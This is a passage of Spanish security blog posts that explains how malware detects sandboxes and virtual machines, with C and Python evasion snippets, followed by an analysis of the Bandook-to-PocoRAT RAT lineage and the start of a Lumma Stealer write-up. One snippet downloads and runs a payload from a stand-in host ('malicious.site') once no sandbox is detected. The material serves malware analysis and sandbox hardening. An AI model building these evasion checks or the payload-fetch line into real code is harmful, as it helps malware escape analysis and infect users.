malicioso: [Imagen: Señal Sandbox] ``` QueryPerformanceCounter((LARGE_INTEGER *)&hKey); // Medida de alta precisión // Cálculo basado en diferencia de tiempo y precisión del reloj if ((double)((int)hKey - (int)Size) / (double)(int)DisplayDevice.cb > 0.1 || (TickCount = GetTickCount(), Sleep(1), GetTickCount() - TickCount > 100)) { strcat_s(lpThreadParameter + 16, 0x400ui64, "Timing anomaly;"); } ``` #### ¿Qué está haciendo este código? 1. QueryPerformanceCounter mide el tiempo con alta precisión (basado en el hardware). - Se compara contra otros valores para ver si hay saltos extraños o lentitud. 2. Sleep(1) + GetTickCount simula una espera de 1 milisegundo. - Si la diferencia entre el tiempo antes y después del Sleep es mayor a 100 ms, es un indicio de que el entorno no se comporta con normalidad. #### ¿Por qué es sospechoso? Porque en un entorno real, dormir 1 ms debería demorar entre 1 y 15 ms, dependiendo del temporizador del sistema. Si la diferencia supera los 100 ms (como en este ejemplo), significa que: - El sistema puede estar siendo emulado. - Hay una interferencia del entorno de análisis. - El tiempo ha sido manipulado (acelerado o ralentizado). #### Otro ejemplo de detección en Python: ```Python import time start = time.time() time.sleep(5) end = time.time() if end - start < 5: # El entorno está acelerando el tiempo exit() ``` ### 7. Interacción con el usuario (detección de inactividad) Una de las formas más inteligentes de detectar si un malware está siendo analizado en una sandbox es comprobar si hay actividad humana real. La mayoría de las sandboxes no mueven el ratón, no escriben con el teclado y no hacen clics, por lo que un malware puede esperar y observar si el usuario está presente antes de activarse. #### ¿Cómo detecta el malware la inactividad? El malware utiliza funciones estándar de Windows que permiten saber: - La posición actual del ratón. - El tiempo desde el último clic. - Si se están generando eventos de teclado o ratón. - La velocidad o frecuencia de los movimientos. Si en varios segundos no detecta interacción, el malware puede asumir que está en una sandbox y no ejecutarse. ### Principales funciones de la API de Windows utilizadas Los fragmentos de código que compartiste emplean principalmente estas funciones clave: Función Propósito GetCursorPos Obtiene la posición actual del puntero del ratón. Sleep Espera un tiempo determinado (en milisegundos). SetWindowsHookExA Permite interceptar eventos de teclado o ratón (hooks). GetSystemMetrics Proporciona métricas del sistema, como si hay mouse o pantalla táctil. GetDoubleClickTime Tiempo entre dos clics para considerarlo "doble clic". GetMessageA / TranslateMessage / DispatchMessageA Captura y procesa mensajes de entrada (teclado, mouse, etc.). [Imagen: Desensamblado mostrando comprobaciones de movimiento y clics del ratón para detectar sandboxes] Podemos observar como en este caso es detectado en Any.run, aunque es aposta, ya que el usuario puede mover el ratón según le convenga. [Imagen: Detección Ratón] #### Ejemplo 1: Detección de movimiento del ratón en 3 segundos ```C POINT prev, curr; prev.x = prev.y = 0; DWORD totalTime = 3000; // 3 segundos DWORD interval = 100; // cada 100 ms while (totalTime) { GetCursorPos(&curr); if (prev.x != 0 && prev.y != 0) { if (curr.x != prev.x || curr.y != prev.y) { return 0; // Se detectó movimiento → hay usuario } } prev = curr; Sleep(interval); totalTime -= interval; } return 1; // Sin movimiento → probablemente sandbox ``` #### Ejemplo 2: Detección de movimientos "humanos" (no aleatorios ni mínimos) ```C POINT prev, curr; int umbralX = GetSystemMetrics(SM_CXSCREEN) / 5; int umbralY = GetSystemMetrics(SM_CYSCREEN) / 5; DWORD tiempo = 3000; GetCursorPos(&prev); while (tiempo) { Sleep(10); GetCursorPos(&curr); if (abs(curr.x - prev.x) > umbralX && abs(curr.y - prev.y) > umbralY) { return 1; // Movimiento significativo → hay usuario } prev = curr; tiempo -= 10; } return 0; // Sin movimiento real ``` #### Ejemplo 3: Captura de eventos con hooks Este código instala un hook de bajo nivel para capturar eventos del mouse: ```C SetTimer(0, 0, 3000, TimerFunc); // Espera 3 segundos hhk = SetWindowsHookExA(WH_MOUSE_LL, callback, 0, 0); while (GetMessageA(&msg, 0, 0, 0) > 0 && msg.message != WM_USER + 1) { TranslateMessage(&msg); DispatchMessageA(&msg); } KillTimer(0, 0); UnhookWindowsHookEx(hhk); if (evento_detectado == 0) { return 1; // No hubo clics → sandbox } ``` Este tipo de técnica requiere interacción humana real para que el malware continúe. ### Técnicas complementarias Además de GetCursorPos, otros malware usan: - GetLastInputInfo → Tiempo desde la última entrada del usuario. - SendInput + GetMessageTime → Para detectar si hay interferencia. - SystemParametersInfo → Para ver configuraciones típicas de usuarios reales. Este es un ejemplo en Windows donde se puede consultar el último input del usuario: ```C LASTINPUTINFO lii; GetLastInputInfo(&lii); DWORD idleTime = GetTickCount() - lii.dwTime; if (idleTime > 300000) { // 5 minutos sin movimiento exit(); } ``` ### 8. Uso de instrucciones de bajo nivel (CPUID, IDTR) Cuando el malware quiere asegurarse de que no se está ejecutando en una máquina virtual o una sandbox, puede recurrir a técnicas de bajo nivel que consultan directamente el procesador. Estas técnicas son muy difíciles de ocultar o interceptar por las herramientas de virtualización, y por tanto son muy efectivas para detectar entornos de análisis. Una de las instrucciones más utilizadas es CPUID, una instrucción de la CPU que permite consultar información sobre las capacidades del procesador. Esta información incluye el fabricante, el modelo, extensiones soportadas… e incluso si el procesador está siendo virtualizado. #### Detección del bit de hipervisor Una de las formas más directas de detectar si se está ejecutando en una máquina virtual es comprobar el bit 31 del registro ECX después de ejecutar cpuid con EAX=1. Este bit se conoce como Hypervisor Present Bit. Si está activado, indica que el sistema operativo está siendo ejecutado dentro de un hipervisor (es decir, una máquina virtual). [Imagen: Detección bit hypervisor] Ejemplo de código adaptado: ```C BOOL DetectaHypervisorBit() { int ecx; __asm { mov eax, 1 cpuid mov ecx, ecx } return (ecx >> 31) & 1; } ``` Si esta función devuelve verdadero, es muy probable que el malware esté corriendo dentro de una máquina virtual como VMware, VirtualBox o Hyper-V, lo que podría hacer que no se ejecute o se comporte de forma diferente. #### Detección del proveedor del hipervisor Otra forma común de detección es consultar el nombre del proveedor de virtualización. Al ejecutar cpuid con EAX = 0x40000000, el procesador devuelve una cadena de texto en los registros EBX, ECX y EDX que identifica el hipervisor (si hay uno presente). [Imagen: Detección Hypervisor] Este nombre puede ser, por ejemplo: - "Microsoft Hv" (cuando se ejecuta sobre Hyper-V) - "VMwareVMware" (para VMware) - "XenVMMXenVMM" (para Xen) - "KVMKVMKVM" (para KVM) Ejemplo adaptado de esta detección: ```C BOOL DetectaProveedorVM() { int eax, ebx, ecx, edx; eax = 0x40000000; __asm { mov eax, 0x40000000 cpuid mov ebx, ebx mov ecx, ecx mov edx, edx } char hypervisorID[13]; memcpy(&hypervisorID[0], &ebx, 4); memcpy(&hypervisorID[4], &ecx, 4); memcpy(&hypervisorID[8], &edx, 4); hypervisorID[12] = '\0'; // Comparar contra proveedores conocidos if (strcmp(hypervisorID, "Microsoft Hv") == 0 || strcmp(hypervisorID, "VMwareVMware") == 0 || strcmp(hypervisorID, "XenVMMXenVMM") == 0 || strcmp(hypervisorID, "KVMKVMKVM") == 0) { return TRUE; // Se detecta virtualización } return FALSE; } ``` Este tipo de técnica es más avanzada que simplemente mirar procesos o ficheros, y suele usarse en malware más sofisticado, ya que requiere conocimientos de bajo nivel sobre cómo funciona la arquitectura x86. 9. Verificación de MAC address (tarjetas de red virtuales) Las interfaces de red virtuales suelen tener direcciones MAC que delatan su origen. Ejemplo: - 00:05:69 (VMware) - 08:00:27 (VirtualBox) El malware puede listar las interfaces de red y verificar si alguna tiene estas direcciones. [Imagen: Virtualización] #### Ejemplo de detección en Python: ```Python import uuid mac = hex(uuid.getnode()) if mac.startswith("0x800027"): exit() ``` ### 10. Revisión de nombres de BIOS o fabricantes El malware puede consultar si el BIOS o el fabricante del sistema es sospechoso. [Imagen: Bios Malware] #### Ejemplos sospechosos: - BIOS: VirtualBox, VMware, QEMU - Fabricante: innotek GmbH, Microsoft Corporation #### Ejemplo de detección en PowerShell: ``` Get-WmiObject win32_bios | Select-Object SerialNumber, Manufacturer, SMBIOSBIOSVersion ``` ## Otras técnicas avanzadas ### 11. Captura del entorno gráfico Los entornos de análisis (como sandboxes) suelen usar configuraciones gráficas mínimas para ahorrar recursos. El malware puede aprovechar esta información para detectar si se encuentra en un entorno real o simulado. #### Indicadores comunes que se comprueban: - Resoluciones de pantalla muy bajas (800×600 o 1024×768). - Falta de fondo de pantalla (wallpaper vacío). - Uso de adaptadores genéricos o nombres sospechosos en los dispositivos gráficos. - Sólo un monitor activo. - Paleta de colores limitada. Estas condiciones pueden indicar que se está ejecutando en un entorno artificial, y algunos malware optan por no ejecutarse si las detectan. ### Ejemplo 1: Comprobación de resolución de pantalla Una resolución inusualmente baja puede indicar un entorno automatizado. ``` BOOL EsResolucionSospechosa() {     int width = GetSystemMetrics(SM_CXSCREEN);     int height = GetSystemMetrics(SM_CYSCREEN);       // Si es menor que HD estándar     if (width < 1024 || height < 768) {         return TRUE;     }     return FALSE; } ``` ### Ejemplo 2: Verificar fondo de pantalla En muchos entornos sandbox el fondo de pantalla está desactivado (cadena vacía o con valor por defecto). ``` BOOL FondoDePantallaVacio() {     char wallpaperPath[MAX_PATH] = {0};     SystemParametersInfoA(SPI_GETDESKWALLPAPER, MAX_PATH, wallpaperPath, 0);       if (strlen(wallpaperPath) == 0) {         return TRUE;     }     // Opcional: comprobar si es el fondo por defecto de Windows     if (strstr(wallpaperPath, "wallpaper") || strstr(wallpaperPath, "default")) {         return TRUE;     }     return FALSE; } ``` ### Ejemplo 3: Comprobación del número de monitores Una máquina real a menudo tiene dos o más monitores conectados. Las sandboxes típicamente solo configuran uno. ``` BOOL SoloUnMonitor() {     return GetSystemMetrics(SM_CMONITORS) <= 1; } ``` ### Ejemplo 4: Obtener nombre del adaptador gráfico Los entornos virtualizados a menudo muestran nombres como "VMware SVGA", "VirtualBox Graphics Adapter" o "Microsoft Basic Display Adapter". ``` BOOL AdaptadorSospechoso() {     DISPLAY_DEVICEA dd;     dd.cb = sizeof(dd);       if (EnumDisplayDevicesA(NULL, 0, &dd, 0)) {         if (strstr(dd.DeviceString, "VirtualBox") ||             strstr(dd.DeviceString, "VMware") ||             strstr(dd.DeviceString, "Microsoft Basic")) {             return TRUE;         }     }     return FALSE; } ``` ### Ejemplo 5: Captura de pantalla (screen grab) Algunos malware toman una imagen de la pantalla y analizan colores, píxeles o si hay "activity" (por ejemplo, ventanas abiertas, movimiento, etc.). ``` BOOL CapturaPantallaYAnaliza() {     HDC hdcScreen = GetDC(NULL);     HDC hdcMem = CreateCompatibleDC(hdcScreen);     HBITMAP hbm = CreateCompatibleBitmap(hdcScreen, 200, 200);  // Pequeño trozo       SelectObject(hdcMem, hbm);     BitBlt(hdcMem, 0, 0, 200, 200, hdcScreen, 0, 0, SRCCOPY);       // Aquí se podrían analizar los píxeles con GetPixel u otras técnicas     // Por ejemplo, contar cuántos píxeles son completamente negros       DeleteObject(hbm);     DeleteDC(hdcMem);     ReleaseDC(NULL, hdcScreen);       return FALSE; // En este ejemplo no se realiza el análisis real } ``` ### 12. Comprobación de conectividad real Uno de los métodos más eficaces para detectar si se está en una sandbox o entorno controlado es probar si se tiene acceso real y sin restricciones a Internet. Las sandboxes suelen: - Bloquear conexiones externas. - Redirigir todo el tráfico a herramientas de simulación como INetSim. - Resolver nombres de dominio con DNS locales falsos o manipulados. El malware puede aprovechar esto para comprobar: 1. Si puede hacer conexiones TCP/UDP reales. 2. Si los dominios específicos resuelven como se espera. 3. Si las respuestas DNS son falsas (por ejemplo, todas apuntan a 127.0.0.1). 4. Si el tiempo de respuesta es muy bajo o sospechosamente igual (lo que sugiere respuestas locales simuladas). ### Ejemplo 1: Conexión simple a IP conocida (Google DNS) ``` import socket try:     socket.create_connection(("8.8.8.8", 53), timeout=3) except:     exit()  # No hay conectividad real, podría estar en sandbox ``` Esto es simple pero efectivo. Si no puede alcanzar 8.8.8.8 (DNS de Google), puede deducir que está aislado. ### Ejemplo 2: Consulta DNS sobre HTTPS (DoH) ```  import requests response = requests.get("https://dns.google/resolve?name=dominio_malicioso.com") if "18.219.X.X" in response.text:     print("Conectividad real confirmada. Ejecutando payload.") else:     exit() ``` #### ¿Qué hace esto exactamente? - El malware no depende del resolver del sistema operativo (que puede estar manipulado). - Consulta directamente a Google DNS vía HTTPS, lo cual es difícil de interceptar por herramientas como INetSim. - Si la respuesta contiene una IP esperada, se considera que está en un entorno real. Esto evita la detección o alteración que muchas sandboxes hacen al interceptar llamadas a gethostbyname, getaddrinfo, etc. ### Ejemplo 3: Verificación de dominios "marcadores" o canary domains El malware puede usar dominios controlados por el atacante (como dominio_malicioso.com) para: - Ver si se resuelven correctamente. - Comprobar si son redirigidos a una IP conocida del sandbox (como 10.0.2.15 o 127.0.0.1). - Ver si no se resuelven en absoluto (lo que indica bloqueo o DNS local falso). ### Ejemplo 4: Tiempo de respuesta DNS Si el DNS responde demasiado rápido, es una señal de que no está saliendo a Internet, sino que está siendo interceptado localmente: ``` import time import socket   start = time.time() try:     socket.gethostbyname("google.com") except:     exit() elapsed = time.time() - start   if elapsed < 0.01:     exit()  # Probablemente resolución local/interceptada ``` ### Ejemplo 5: Comparar múltiples respuestas DNS Un truco más avanzado consiste en hacer varias peticiones del mismo dominio y verificar si las respuestas son coherentes. Los entornos simulados a veces responden igual para todo. ``` import dns.resolver   ips = [] for _ in range(3):     result = dns.resolver.resolve("google.com")     ips.append(result[0].to_text())   if len(set(ips)) == 1:     print("Respuesta DNS sospechosamente constante") ``` ### 13. Técnicas de retardo (delayed execution) El malware espera minutos u horas antes de ejecutarse, sabiendo que muchas sandboxes solo observan durante unos segundos. En una sandbox, si no se observa actividad maliciosa dentro del tiempo asignado, el análisis termina y el malware pasa desapercibido. ### Técnicas comunes de retardo 1. Sleep() largo ``` Sleep(10 * 60 * 1000);  // 10 minutos ``` 2. Loops inútiles ("sleep loops") ``` for (int i = 0; i < 0xFFFFFFF; i++) {     __asm__("nop"); } ``` 3. Basado en hora real ``` time_t now = time(NULL); struct tm *tm_now = localtime(&now); if (tm_now->tm_hour < 6) {     exit(0); // Solo ejecuta en horario "de oficina" } ``` 4. Comprobación de uptime del sistema ``` if (uptime < 300) exit(0); // No ejecutar si el sistema se acaba de iniciar ``` ### Anti-análisis: Sleep patching y Sleep skipping Los entornos de análisis modernos (ej. Cuckoo, CAPE) parchean Sleep() para que no se esperen realmente los segundos indicados. En respuesta, el malware puede hacer comprobaciones como: ``` DWORD before = GetTickCount(); Sleep(10000);  // 10 segundos DWORD after = GetTickCount();   if ((after - before) < 9500) {     exit();  // El sleep fue manipulado } ``` ### Ejemplo en Python (entorno controlado) ``` import time   print("Esperando...") time.sleep(600)  # 10 minutos print("Ahora ejecuto la carga útil") ``` Esto haría que la mayoría de sandboxes desistan de analizar el comportamiento. ### 14. Cifrado o empaquetado del payload Muchos malware modernos no contienen directamente su carga maliciosa (payload), sino que la empaquetan, cifran o la descargan dinámicamente. Esto les permite ocultar su funcionalidad real hasta que detectan que no están siendo analizados o que están en una máquina real (no virtual, no sandbox). Esto complica tanto la detección estática (porque el código malicioso está cifrado/comprimido) como la detección dinámica (porque no se ejecuta hasta pasar ciertas condiciones). ### Técnicas comunes #### 1. Cifrado en memoria (In-Memory Decryption) - El payload está cifrado en el binario. - Solo se descifra y ejecuta si no se detectan herramientas como Wireshark, Procmon, INetSim, sandbox, etc. - Se usan algoritmos simples (XOR, RC4, AES) para no llamar la atención. ``` for (int i = 0; i < len; i++) {     decrypted[i] = encrypted[i] ^ key; } ``` #### 2. Descarga condicional (Payload Fetching) - El malware hace una solicitud a un C2 (Command & Control) para descargar el verdadero payload. - Si detecta un entorno artificial (por ejemplo, una red simulada como INetSim), no descarga nada. ``` import requests if not in_sandbox():     response = requests.get("http://malicious.site/payload.bin")     execute(response.content) ``` ### 3.Uso de packers o crypters El malware está protegido con software como: - UPX (legítimo pero usado por malware) - Themida, VMProtect, Enigma Protector, etc. Estos packers pueden ocultar el código real hasta que se desempaqueta en tiempo de ejecución. #### 4. Polimorfismo / Metamorfismo - Cada instancia del malware tiene un código cifrado distinto. - Genera cargas con diferentes hashes para evadir firmas YARA o antivirus. ## ¿Qué pueden hacer los analistas para evitar estas detecciones? - Usar nombres y configuraciones realistas en las VMs. - Aumentar la memoria RAM y los núcleos para simular un entorno real. - Cambiar el nombre de procesos y servicios comunes. - Configurar fondo de pantalla, resolución, nombre de usuario, etc. - Simular actividad del usuario (ratón, teclado). - Ocultar drivers, dispositivos y nombres de fabricante con el hardening del entorno. - Usar múltiples entornos de análisis (dinámico + estático). ## Referencias: https://evasions.checkpoint.com/ https://github.com/a0rtega/pafish https[://]app.any.run/tasks/e11592e9-6171-4d53-ac5a-a71cac09c0dc https[://]app.any.run/tasks/777d9c98-8c0f-4364-b15c-00a7147d2b1a https[://]app.any.run/tasks/45e477ff-f65c-4f81-b90e-60f4911fbcf4 https[://]app.any.run/tasks/2ce91eeb-211a-41a5-984b-8725c76dbfb0 https[://]app.any.run/tasks/dbffac76-26ec-42fa-9bb3-6a4d5fd9d748 https[://]app.any.run/tasks/364ac0d8-07c6-4976-b7d4-2265fdd38e08 https[://]app.any.run/tasks/23360142-b1f9-48fb-b49e-45ddee773758 https[://]app.any.run/tasks/b965bf51-74e0-4678-af02-e104b43bb589 https[://]app.any.run/tasks/0e58cd94-dc81-440d-bf0d-301851031594 https[://]app.any.run/tasks/1bb7922e-2317-4ede-8849-1d342947eae1 https[://]app.any.run/tasks/3e633620-047d-4753-b96b-fa4b1eae0f26 https[://]app.any.run/tasks/68252d62-5409-4b38-9522-8b0396854f47 https[://]app.any.run/tasks/1d410d0f-b6be-4e95-87e1-1553fd085bf6 https[://]app.any.run/tasks/1dd892ba-923b-4a48-a7f5-3104a6e0a93e https[://]app.any.run/tasks/a2ec5c94-2801-4670-a0a5-0b308e0ecd19 https[://]app.any.run/tasks/c77df736-5a63-41de-a901-022a2ea18a78 https[://]app.any.run/tasks/cc265a2a-35c5-43cf-a4b9-4f1ba1226641 ## Conclusión La detección de entornos virtuales o de análisis es una de las estrategias más comunes y efectivas que emplean los malware modernos para evitar ser descubiertos y estudiados. Como hemos visto (las principales que no todas), existen desde métodos muy simples como comprobar el nombre del equipo, hasta técnicas complejas usando instrucciones de bajo nivel del procesador. Conocer estas técnicas es esencial para los analistas de malware, los desarrolladores de herramientas de sandboxing, y cualquier persona interesada en la seguridad informática. Espero que os haya sido útil para comprender mejor este fascinante y desafiante mundo de la detección por parte del malware de entornos virtualizados o de sandbox. Hasta otra!! --- # La Evolución de Bandook a PocoRAT: Un Viaje de la Cibervigilancia a la Cibercriminalidad Financiera URL: https://ciberseguridad.blog/la-evolucion-de-bandook-a-pocorat-un-viaje-de-la-cibervigilancia-a-la-cibercriminalidad-financiera/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2025-05-09 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > PocoRAT surge como la evolución sofisticada de Bandook, un viejo troyano RAT usado en campañas de ciberespionaje y exfiltración corporativa La historia del malware es una carrera armamentista entre los ciberdelincuentes que buscan nuevas formas de evadir la detección y las organizaciones de seguridad que intentan protegerse. Uno de los ejemplos más notables de esta evolución en los últimos años es la transformación de Bandook, un antiguo troyano de acceso remoto (RAT, por sus siglas en inglés), en una amenaza más sofisticada y evasiva conocida como PocoRAT. ## Bandook: un viejo conocido en el mundo del ciberespionaje Bandook es un malware que tiene sus raíces en 2005, aunque no fue hasta 2016 que se comenzaron a documentar su uso y campañas específicas, cuando salió a la luz en operaciones de espionaje dirigidas a periodistas y disidentes en Europa. Desde ese momento, Bandook se vinculó a campañas de vigilancia, y su versatilidad lo convirtió en una herramienta recurrente en manos de grupos que operan bajo el modelo de malware-as-a-service. Uno de los aspectos más relevantes de Bandook es su enfoque hacia la exfiltración de información en organizaciones. Sus campañas, como la identificada en 2021 en Venezuela, se centraron en sectores corporativos, desde manufactura y salud hasta retail y construcción, lo que sugiere un interés en espionaje corporativo más que en actividades puramente políticas. Lo interesante de esta campaña es que, a pesar de haber estado activa desde al menos 2015, permaneció sin ser documentada hasta su descubrimiento años después, cuando se le asignó el nombre de Bandook. ## El funcionamiento técnico de Bandook Bandook funciona mediante un dropper que se encarga de desplegar la carga maliciosa y garantizar la persistencia en los sistemas infectados. [Imagen: Diagrama que ilustra las etapas de infección del malware Bandook, desde la ejecución del dropper hasta la inyección en procesos legítimos] Originalmente codificado en Delphi, el dropper almacena el payload cifrado en la sección de recursos del archivo, utilizando algoritmos como CAST-256, y más recientemente GOST, para proteger el código. [Imagen: Captura de la sección de recursos del dropper de Bandook codificado en Delphi, mostrando el payload cifrado.] Esta carga, empaquetada con la utilidad UPX 3.01, se inyecta en procesos legítimos, como iexplore.exe, msinfo32.exe u otros, utilizando una técnica llamada Process Hollowing, en la que el malware reemplaza el código de un proceso benigno por el suyo, lo que le permite ejecutar su carga maliciosa sin levantar sospechas. [Imagen: Representación del método de inyección de Bandook en procesos legítimos mediante la técnica de Process Hollowing.] Una vez desplegado, Bandook establece comunicación con un servidor de comando y control (C2) utilizando encriptación AES en modo CFB, lo que asegura que la información exfiltrada (como nombres de usuario, versión del sistema operativo, y más) llegue de manera segura al atacante. [Imagen: Depurador x32dbg mostrando tráfico de red capturado en el puerto 9995 del proceso msinfo32.exe] Podemos observar la configuración que será utilizada en otra muestra para la obtención del C2 y posterior comunicación. [Imagen: Cadena de configuración en memoria con el dominio de túnel ngrok.io y mutex del malware] Bandook también asegura la persistencia al crear copias de sí mismo y agregar entradas en el registro de Windows que garantizan su ejecución en cada reinicio del sistema. [Imagen: Clave de registro Run con la entrada JUDS que apunta a juds.exe para persistencia] Bandook, aunque eficiente y peligroso, tenía sus limitaciones en cuanto a evasión y detección. Era un malware que, aunque difícil de detectar, era posible rastrear y contrarrestar con las herramientas adecuadas. Sin embargo, el panorama cambió con la aparición de PocoRAT, una evolución de Bandook que adopta técnicas más avanzadas para evitar la detección y ampliar su rango de acción. ## PocoRAT: la nueva cara del espionaje y cibercrimen financiero A medida que los grupos cibercriminales continúan adaptándose a las contramedidas de seguridad, PocoRAT surge como una versión más avanzada y sofisticada de Bandook, vinculada al grupo de cibermercenarios Dark Caracal, famoso por sus campañas de espionaje. PocoRAT representa un avance en las técnicas de infección, evasión y persistencia, y ha sido utilizado principalmente para campañas de phishing y espionaje financiero dirigidas a organizaciones de habla hispana en América Latina. ### Técnicas de evasión y nuevos métodos de entrega Uno de los mayores cambios en PocoRAT es su capacidad para evadir las defensas mediante varias capas de ofuscación. Entre las nuevas técnicas que implementa están: - Resolución dinámica de APIs: PocoRAT oculta las llamadas a funciones maliciosas, haciendo más difícil para los investigadores rastrear su comportamiento. - Encriptación Twofish con claves únicas por compilación: Los atacantes aseguran que los análisis estáticos sean extremadamente complejos al utilizar un algoritmo de encriptación más avanzado que AES, dificultando la ingeniería inversa del malware. - Secuestro de manejadores de excepciones: PocoRAT redirige la ejecución del código para evitar que los depuradores y las herramientas de análisis detecten su presencia. Otra característica clave de PocoRAT es su sofisticado método de entrega a través de señuelos en PDFs maliciosos y el uso de sistemas en la nube, lo que no solo aumenta su capacidad de infección, sino que también ayuda a esconder su actividad detrás de servicios legítimos. ## Funcionalidad mejorada y persistencia Una vez desplegado, PocoRAT sigue una lógica similar a la de Bandook, también empaquetada con la utilidad UPX 3.01, pero con importantes mejoras. Realiza un perfilado del entorno del sistema infectado, verificando si está ejecutándose en un entorno virtualizado (como VirtualBox o Vmware 0×5658) para evitar ser detectado en laboratorios de análisis. [Imagen: Código en IDA Pro comprobando la clave de registro SOFTWARE Oracle VirtualBox] Además, PocoRAT se dedica a la recolección de una mayor variedad de datos, como nombres de usuario, versiones del sistema operativo y métricas de memoria, que luego envía a su servidor de comando y control. [Imagen: Desensamblado con llamadas a GetUserNameA, GetComputerNameA e IsDebuggerPresent para evadir análisis] Al igual que Bandook, PocoRAT utiliza cifrado para las comunicaciones con sus servidores, pero ahora implementa mensajes de tipo heartbeat, lo que le permite mantenerse activo y evadir posibles bloqueos o interrupciones en la comunicación. PocoRAT también es más resiliente, ya que cambia de puertos de comunicación frecuentemente (utilizando puertos como 5604, 6211, 6212, 6213, 6215, 6216, 6542, 6543, 6545, 7451, 7455, 7456, 7831, 7832, 7833, 7834, 7835, 7836 o 7458), lo que dificulta la detección y el bloqueo de sus conexiones. [Imagen: Wireshark mostrando el flujo TCP cifrado hacia la IP 193.233.203.63 en el puerto 6211] ## Capacidades avanzadas de ejecución de comandos Además de su sofisticación en la evasión y persistencia, PocoRAT también ha mejorado en cuanto a la ejecución de comandos en los sistemas comprometidos. Algunas de sus nuevas capacidades incluyen: - Captura de pantalla: PocoRAT puede tomar capturas del escritorio de la víctima, lo que permite a los atacantes obtener información visual directamente. - Ejecución fileless: Este tipo de ataque, conocido como fileless malware, permite a PocoRAT ejecutar comandos en la máquina sin dejar rastros en el sistema de archivos, lo que complica aún más su detección. - Acceso directo al símbolo del sistema: PocoRAT puede ejecutar comandos directamente en la línea de comandos, otorgando un control más granular sobre la máquina comprometida. [Imagen: Código de Bandook en IDA Pro ejecutando comandos mediante la función CreateProcessA] ## De Bandook a PocoRAT: ¿Qué Cambió? La evolución de Bandook a PocoRAT no solo representa un cambio en las técnicas empleadas, sino también en el enfoque de las campañas. Bandook fue originalmente utilizado en actividades de ciberespionaje, centrándose en objetivos como periodistas y disidentes políticos. Inicialmente programado en Delphi (tanto el loader como el payload) pasó a C++ (el payload) al igual que PocoRAT (continuó con su programación en la payload en C++, manteniendo Delphi para el loader), en cambio, amplía su alcance hacia campañas de phishing y espionaje financiero, adaptándose a un nuevo conjunto de víctimas, como organizaciones corporativas en América Latina, y utilizando señuelos más sofisticados. [Imagen: Comparación hexadecimal de las cabeceras UPX de los payloads Bandook y PocoRAT] Otro cambio importante es la sofisticación técnica. PocoRAT emplea técnicas mucho más avanzadas de evasión y persistencia, como la resolución dinámica de APIs, el cifrado Twofish y el secuestro de manejadores de excepciones, lo que lo convierte en una amenaza más difícil de detectar y neutralizar que Bandook. Las similitudes entre Bandook y PocoRAT no se limitan únicamente a la campaña general y los objetivos que comparten, sino que también se extienden a aspectos técnicos fundamentales, tanto en el loader como en el payload final. [Imagen: Comparación del código de los loaders de Bandook y PocoRAT con funciones similares en Delphi] Ambos malwares muestran un comportamiento sorprendentemente similar en estos componentes clave, lo que indica una clara evolución de Bandook hacia PocoRAT, más que el desarrollo de una herramienta completamente nueva. [Imagen: Comparación del código de los payloads de Bandook y PocoRAT leyendo claves de registro] Los mecanismos de carga y la estructura del payload final guardan muchas similitudes, desde las técnicas de inyección de procesos hasta los métodos de comunicación con los servidores de control (C2). Esta continuidad en el diseño refuerza la hipótesis de que PocoRAT es una evolución directa del código base de Bandook, adaptado con nuevas funcionalidades y estrategias de evasión para mantenerse relevante frente a las actuales medidas de defensa. Uno de los aspectos más interesantes de la evolución de Bandook hacia PocoRAT es la incorporación de tecnologías avanzadas en su desarrollo. En particular, se ha detectado que PocoRAT utiliza The POCO C++ Libraries como parte de su arquitectura subyacente. [Imagen: Ventana de cadenas en IDA Pro con rutas de la librería Poco 1.12.4] Estas bibliotecas, conocidas por ser potentes y multiplataforma, están diseñadas para desarrollar aplicaciones basadas en redes e internet que pueden ejecutarse en una amplia gama de sistemas, desde servidores y equipos de escritorio hasta dispositivos móviles, sistemas IoT y sistemas embebidos. La elección de POCO C++ por los desarrolladores de PocoRAT muestra no solo su habilidad técnica, sino también su intención de crear un malware versátil y robusto, capaz de operar en diferentes entornos. Esta decisión tecnológica permite a PocoRAT aprovechar funcionalidades optimizadas para la comunicación en red, facilitando tanto el control remoto como la exfiltración de datos de manera eficiente y silenciosa. La evolución de Bandook a PocoRAT es un claro ejemplo de cómo las ciberamenazas evolucionan con el tiempo, adoptando nuevas técnicas para evitar la detección y ampliando su espectro de acción. PocoRAT, con sus avanzadas técnicas de evasión y su enfoque en el espionaje financiero, representa una amenaza creciente para las organizaciones de habla hispana en América Latina. Esta evolución nos recuerda que, en el mundo del malware, la innovación es constante, y las organizaciones deben mantenerse alerta y adaptar sus defensas para enfrentar estas nuevas amenazas. Espero que os haya gustado y nos vemos en el siguiente POST!! --- # Obteniendo los C2 de Lumma Stealers de forma dinámica URL: https://ciberseguridad.blog/como-extraer-dinamicamente-los-servidores-c2-de-lumma-stealer-analisis-avanzado-de-malware/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2025-04-02 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > Aprende a identificar y extraer dinámicamente los servidores C2 del malware Lumma Stealer mediante técnicas avanzadas de análisis y reversing. Hola a tod@s!! Seguro que últimamente habéis oído hablar de Lumma Stealer, parece estar de moda y su uso ha subido como la espuma así que vamos a hablar un poco de él. Si buscamos a Lumma en Malware Trends de Any.run lo tenemos nada más y nada menos que en el TOP 1. [Imagen: Lumma Stralers] Aprovechando la información que ofrece esta plataforma tenemos la siguiente descripción del malware: > “Lumma es un stealer ampliamente accesible que se vende abiertamente en foros de la Dark Web y canales de Telegram. Aunque no es tan popular como otros (RedLine y Formbook), ha ganado una tracción considerable entre los ciberdelincuentes que se centran en exfiltrar información confidencial de víctimas desprevenidas. Operado por un grupo que se cree que se originó en países de la ex URSS, Lumma Stealer ha estado evolucionando activamente desde su aparición inicial en 2022, recibiendo actualizaciones sustanciales que mejoran sus capacidades.” Si queremos ir a tiro hecho, buscaremos detecciones en el que solamente aparezca una mención a Lumma y ninguno más o correremos el riesgo de perdernos en el bosque. [Imagen: Detecciónes Lumia] Seleccionamos un par de ellos al azar: - https://app.any.run/tasks/e10cb2f0-5400-45a1-939b-2ded96ef51e3 - https://app.any.run/tasks/cdf33f86-2ae1-4567-9a5a-f5520e2d0151 ``` $ sha256sum * c3b2dc36b6413c733de9d97ae5b52b48e12676cf591530f1ce26b2a7de6ab2cd Solara.exe 79bf1f088f590b8e24eaf5eb4b654bd7534102593a30af3475dd8dd57aed1d2b Yanto.exe ``` Lo primero, identificamos que tipo de ficheros estamos tratando así como con qué herramienta fueron compilados. ``` 